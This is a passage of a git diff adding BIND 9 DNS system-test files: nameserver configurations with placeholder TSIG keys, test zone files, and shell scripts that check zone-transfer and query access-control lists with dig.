MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; + allow-query-on { 10.53.0.2; }; + blackhole { 10.53.0.8; }; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { !key one; any; }; +}; diff --git a/bin/tests/system/acl/ns3/example.db b/bin/tests/system/acl/ns3/example.db new file mode 100644 index 0000000..34fe9e5 --- /dev/null +++ b/bin/tests/system/acl/ns3/example.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 diff --git a/bin/tests/system/acl/ns3/named.conf.in b/bin/tests/system/acl/ns3/named.conf.in new file mode 100644 index 0000000..fceed38 --- /dev/null +++ b/bin/tests/system/acl/ns3/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify no; + allow-new-zones yes; + allow-transfer { none; }; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/acl/ns4/example.db b/bin/tests/system/acl/ns4/example.db new file mode 100644 index 0000000..91c8702 --- /dev/null +++ b/bin/tests/system/acl/ns4/example.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.4 diff --git a/bin/tests/system/acl/ns4/existing.db b/bin/tests/system/acl/ns4/existing.db new file mode 100644 index 0000000..91c8702 --- /dev/null +++ b/bin/tests/system/acl/ns4/existing.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.4 diff --git a/bin/tests/system/acl/ns4/named.conf.in b/bin/tests/system/acl/ns4/named.conf.in new file mode 100644 index 0000000..6389c33 --- /dev/null +++ b/bin/tests/system/acl/ns4/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify no; + allow-new-zones yes; + allow-transfer { none; }; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +zone "existing" { + type primary; + file "existing.db"; +}; diff --git a/bin/tests/system/acl/setup.sh b/bin/tests/system/acl/setup.sh new file mode 100644 index 0000000..2f2db71 --- /dev/null +++ b/bin/tests/system/acl/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +$SHELL ../genzone.sh 2 3 >ns2/example.db +$SHELL ../genzone.sh 2 3 >ns2/tsigzone.db +copy_setports ns2/named1.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf diff --git a/bin/tests/system/acl/tests.sh b/bin/tests/system/acl/tests.sh new file mode 100644 index 0000000..19e5c8f --- /dev/null +++ b/bin/tests/system/acl/tests.sh @@ -0,0 +1,228 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +t=0 + +echo_i "testing basic ACL processing" +# key "one" should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + + +# any other key should be fine +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 + +# prefix 10/8 should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# any other address should work, as long as it sends key "one" +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 127.0.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 127.0.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +echo_i "testing nested ACL processing" +# all combinations of 10.53.0.{1|2} with key {one|two}, should succeed +copy_setports ns2/named3.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# but only one or the other should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 127.0.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $tt failed" ; status=1; } + +# and other values? right out +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 127.0.0.1 axfr -y "${DEFAULT_HMAC}:three:1234abcd8765" > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# now we only allow 10.53.0.1 *and* key one, or 10.53.0.2 *and* key two +copy_setports ns2/named4.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.3 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +echo_i "testing allow-query-on ACL processing" +copy_setports ns2/named5.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 +t=`expr $t + 1` +$DIG -p ${PORT} +tcp soa example. \ + @10.53.0.2 -b 10.53.0.3 > dig.out.${t} +grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +echo_i "testing blackhole ACL processing" +t=`expr $t + 1` +ret=0 +$DIG -p ${PORT} +tcp soa example. \ + @10.53.0.2 -b 10.53.0.3 > dig.out.1.${t} +grep "status: NOERROR" dig.out.1.${t} > /dev/null 2>&1 || ret=1 +$DIG -p ${PORT} +tcp soa example. \ + @10.53.0.2 -b 10.53.0.8 > dig.out.2.${t} +grep "status: NOERROR" dig.out.2.${t} > /dev/null 2>&1 && ret=1 +grep "communications error" dig.out.2.${t} > /dev/null 2>&1 || ret=1 +$DIG -p ${PORT} soa example. \ + @10.53.0.2 -b 10.53.0.3 > dig.out.3.${t} +grep "status: NOERROR" dig.out.3.${t} > /dev/null 2>&1 || ret=1 +$DIG -p ${PORT} soa example. \ + @10.53.0.2 -b 10.53.0.8 > dig.out.4.${t} +grep "status: NOERROR" dig.out.4.${t} > /dev/null 2>&1 && ret=1 +grep "connection timed out" dig.out.4.${t} > /dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# AXFR tests against ns3 + +echo_i "testing allow-transfer ACLs against ns3 (no existing zones)" + +echo_i "calling addzone example.com on ns3" +$RNDCCMD 10.53.0.3 addzone 'example.com {type primary; file "example.db"; }; ' +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "checking AXFR of example.com from ns3 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.3 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "calling rndc reconfig" +rndc_reconfig ns3 10.53.0.3 + +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "re-checking AXFR of example.com from ns3 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.3 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# AXFR tests against ns4 + +echo_i "testing allow-transfer ACLs against ns4 (1 pre-existing zone)" + +echo_i "calling addzone example.com on ns4" +$RNDCCMD 10.53.0.4 addzone 'example.com {type primary; file "example.db"; }; ' +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "checking AXFR of example.com from ns4 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.4 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "calling rndc reconfig" +rndc_reconfig ns4 10.53.0.4 + +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "re-checking AXFR of example.com from ns4 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.4 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/additional/clean.sh b/bin/tests/system/additional/clean.sh new file mode 100644 index 0000000..c43c36e --- /dev/null +++ b/bin/tests/system/additional/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after tests. +# + +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/additional/ns1/mx.db b/bin/tests/system/additional/ns1/mx.db new file mode 100644 index 0000000..6305e8b --- /dev/null +++ b/bin/tests/system/additional/ns1/mx.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 + MX 0 mail +ns1 A 10.53.0.1 +mail A 1.2.3.4 +_25._tcp.mail TLSA 3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383 diff --git a/bin/tests/system/additional/ns1/named.args b/bin/tests/system/additional/ns1/named.args new file mode 100644 index 0000000..15aa849 --- /dev/null +++ b/bin/tests/system/additional/ns1/named.args @@ -0,0 +1,2 @@ +# this server runs named with only one worker thread +-m record,size,mctx -c named.conf -d 99 -D additional-ns1 -X named.lock -g -n 1 -T maxcachesize=2097152 diff --git a/bin/tests/system/additional/ns1/named1.conf.in b/bin/tests/system/additional/ns1/named1.conf.in new file mode 100644 index 0000000..d058d1e --- /dev/null +++ b/bin/tests/system/additional/ns1/named1.conf.in @@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses yes; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/named2.conf.in b/bin/tests/system/additional/ns1/named2.conf.in new file mode 100644 index 0000000..56c6d4b --- /dev/null +++ b/bin/tests/system/additional/ns1/named2.conf.in @@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/named3.conf.in b/bin/tests/system/additional/ns1/named3.conf.in new file mode 100644 index 0000000..ad453a3 --- /dev/null +++ b/bin/tests/system/additional/ns1/named3.conf.in @@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-any yes; + minimal-responses no-auth; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/named4.conf.in b/bin/tests/system/additional/ns1/named4.conf.in new file mode 100644 index 0000000..69479b9 --- /dev/null +++ b/bin/tests/system/additional/ns1/named4.conf.in @@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no-auth-recursive; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "mx.example" { + type primary; + file "mx.db"; +}; + +zone "srv.example" { + type primary; + file "srv.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/naptr.db b/bin/tests/system/additional/ns1/naptr.db new file mode 100644 index 0000000..51d3c85 --- /dev/null +++ b/bin/tests/system/additional/ns1/naptr.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +nap IN NAPTR 50 50 "S" "SIPS+D2T" "" server +server SRV 0 0 5061 server +server A 192.168.2.9 +server AAAA 192::9 diff --git a/bin/tests/system/additional/ns1/naptr2.db b/bin/tests/system/additional/ns1/naptr2.db new file mode 100644 index 0000000..78ca4ad --- /dev/null +++ b/bin/tests/system/additional/ns1/naptr2.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +nap IN NAPTR 50 50 "S" "SIPS+D2T" "" server.hang3a.zone. +www AAAA 192::99 +www A 192.168.2.99 +www X25 100099 diff --git a/bin/tests/system/additional/ns1/nid.db b/bin/tests/system/additional/ns1/nid.db new file mode 100644 index 0000000..f76b52e --- /dev/null +++ b/bin/tests/system/additional/ns1/nid.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +ns1 NID 2 0:0:0:0 +ns1 L64 2 0:0:0:0 +ns1 L32 2 0.0.0.0 +nid2 NID 2 0:0:0:1 +nid2 LP 2 ns1 diff --git a/bin/tests/system/additional/ns1/root.db b/bin/tests/system/additional/ns1/root.db new file mode 100644 index 0000000..94cfdda --- /dev/null +++ b/bin/tests/system/additional/ns1/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. IN SOA ns2. hostmaster ( 2 8H 2H 4W 1D); +. NS ns1.rt.example. +. NS ns2.rt.example. +ns1.rt.example. A 10.53.0.1 +ns2.rt.example. A 10.53.0.2 +rt.example. NS ns1. +naptr.example. NS ns1. +rt2.example. NS ns1. +naptr2.example. NS ns1. +nid.example. NS ns1. diff --git a/bin/tests/system/additional/ns1/rt.db b/bin/tests/system/additional/ns1/rt.db new file mode 100644 index 0000000..c858f0d --- /dev/null +++ b/bin/tests/system/additional/ns1/rt.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 + NS ns1.rt2.example. +ns1 A 10.53.0.1 + +rt RT 2 www +www AAAA 192::99 +www A 192.168.2.99 +www X25 100099 diff --git a/bin/tests/system/additional/ns1/rt2.db b/bin/tests/system/additional/ns1/rt2.db new file mode 100644 index 0000000..b61a198 --- /dev/null +++ b/bin/tests/system/additional/ns1/rt2.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +rt RT 2 www.hang3b.zone. +server SRV 0 0 5061 server +server A 192.168.2.9 +server AAAA 192::9 diff --git a/bin/tests/system/additional/ns1/srv.db b/bin/tests/system/additional/ns1/srv.db new file mode 100644 index 0000000..0aee21a --- /dev/null +++ b/bin/tests/system/additional/ns1/srv.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 +_xmpp-client._tcp SRV 1 0 5222 server +server A 1.2.3.4 +_5222._tcp.server TLSA 3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383 diff --git a/bin/tests/system/additional/ns2/named.conf.in b/bin/tests/system/additional/ns2/named.conf.in new file mode 100644 index 0000000..dae255d --- /dev/null +++ b/bin/tests/system/additional/ns2/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can 